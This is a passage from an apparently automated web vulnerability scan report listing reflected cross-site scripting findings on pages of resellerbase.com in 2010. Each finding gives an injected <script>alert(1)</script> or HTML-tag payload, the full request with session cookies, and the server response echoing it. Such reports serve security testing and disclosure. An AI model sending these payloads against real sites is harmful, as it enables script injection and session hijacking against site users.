Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes922d5<script>alert(1)</script>f1bc113228b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1466. http://www.resellerbase.com/detail/17/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c648b<script>alert(1)</script>295ab32d8f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/search.phpc648b<script>alert(1)</script>295ab32d8f0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.phpc648b<script>alert(1)</script>295ab32d8f0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1467. http://www.resellerbase.com/detail/17/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b2109<a>9dbf98faf9d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/search.php?keyword=search...&Submit3=Searchb2109<a>9dbf98faf9d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.php?keyword=search...&Submit3=Searchb2109<a>9dbf98faf9d&opt=2 was not found on this server.</p>
...[SNIP]...

2.1468. http://www.resellerbase.com/detail/17/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8f688<a>39b4db897f9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/search.php?keyword=search...8f688<a>39b4db897f9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.php?keyword=search...8f688<a>39b4db897f9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1469. http://www.resellerbase.com/detail/17/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 390d1<script>alert(1)</script>d441cfa2d0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2&390d1<script>alert(1)</script>d441cfa2d0e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2&390d1<script>alert(1)</script>d441cfa2d0e=1 was not found on this server.</p>
...[SNIP]...

2.1470. http://www.resellerbase.com/detail/17/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 649b8<a>0f4cab94fbb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2649b8<a>0f4cab94fbb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2649b8<a>0f4cab94fbb was not found on this server.</p>
...[SNIP]...

2.1471. http://www.resellerbase.com/detail/18/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 154d9<script>alert(1)</script>386133b5cca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail154d9<script>alert(1)</script>386133b5cca/18/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail154d9<script>alert(1)</script>386133b5cca/18/ was not found on this server.</p>
...[SNIP]...

2.1472. http://www.resellerbase.com/detail/18/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dd8f<script>alert(1)</script>f613e8e2dda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/181dd8f<script>alert(1)</script>f613e8e2dda/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/181dd8f<script>alert(1)</script>f613e8e2dda/ was not found on this server.</p>
...[SNIP]...

2.1473. http://www.resellerbase.com/detail/18/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 61e51<script>alert(1)</script>deac318f665 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/?61e51<script>alert(1)</script>deac318f665=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/?61e51<script>alert(1)</script>deac318f665=1 was not found on this server.</p>
...[SNIP]...

2.1474. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5ec7<script>alert(1)</script>f4ec90e4df5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila5ec7<script>alert(1)</script>f4ec90e4df5/18/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila5ec7<script>alert(1)</script>f4ec90e4df5/18/rating.php was not found on this server.</p>
...[SNIP]...

2.1475. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4c5f<script>alert(1)</script>dc9ef4bdb96377388 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaile4c5f<script>alert(1)</script>dc9ef4bdb96377388/18/rating.php?id=18&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile4c5f<script>alert(1)</script>dc9ef4bdb96377388/18/rating.php?id=18&rating=5 was not found on this server.</p>
...[SNIP]...

2.1476. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0bff<script>alert(1)</script>42e354bf025 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18b0bff<script>alert(1)</script>42e354bf025/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18b0bff<script>alert(1)</script>42e354bf025/rating.php was not found on this server.</p>
...[SNIP]...

2.1477. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d252<script>alert(1)</script>61c89e2af014c9ac9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/183d252<script>alert(1)</script>61c89e2af014c9ac9/rating.php?id=18&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/183d252<script>alert(1)</script>61c89e2af014c9ac9/rating.php?id=18&rating=5 was not found on this server.</p>
...[SNIP]...

2.1478. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eda8e<script>alert(1)</script>3b942f08551 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/rating.phpeda8e<script>alert(1)</script>3b942f08551 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/rating.phpeda8e<script>alert(1)</script>3b942f08551 was not found on this server.</p>
...[SNIP]...

2.1479. http://www.resellerbase.com/detail/18/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 80ef9<script>alert(1)</script>bb05147c6c1a19f5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/18/rating.php80ef9<script>alert(1)</script>bb05147c6c1a19f5?id=18&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/rating.php80ef9<script>alert(1)</script>bb05147c6c1a19f5?id=18&rating=5 was not found on this server.</p>
...[SNIP]...

2.1480. http://www.resellerbase.com/detail/18/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b7c8d<script>alert(1)</script>37047e11a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/rating.php?b7c8d<script>alert(1)</script>37047e11a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/rating.php?b7c8d<script>alert(1)</script>37047e11a7=1 was not found on this server.</p>
...[SNIP]...

2.1481. http://www.resellerbase.com/detail/18/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6defe<script>alert(1)</script>d80f205355cd65d8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/18/rating.php/6defe<script>alert(1)</script>d80f205355cd65d8f?id=18&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/rating.php/6defe<script>alert(1)</script>d80f205355cd65d8f?id=18&rating=5 was not found on this server.</p>
...[SNIP]...

2.1482. http://www.resellerbase.com/detail/18/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4dcf<script>alert(1)</script>92eaec6c651 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf4dcf<script>alert(1)</script>92eaec6c651/18/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf4dcf<script>alert(1)</script>92eaec6c651/18/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1483. http://www.resellerbase.com/detail/18/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8197c<script>alert(1)</script>04ae92a4b80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/188197c<script>alert(1)</script>04ae92a4b80/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/188197c<script>alert(1)</script>04ae92a4b80/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1484. http://www.resellerbase.com/detail/18/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/18/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbc2b<script>alert(1)</script>65a591a3eb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/search.phpdbc2b<script>alert(1)</script>65a591a3eb5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

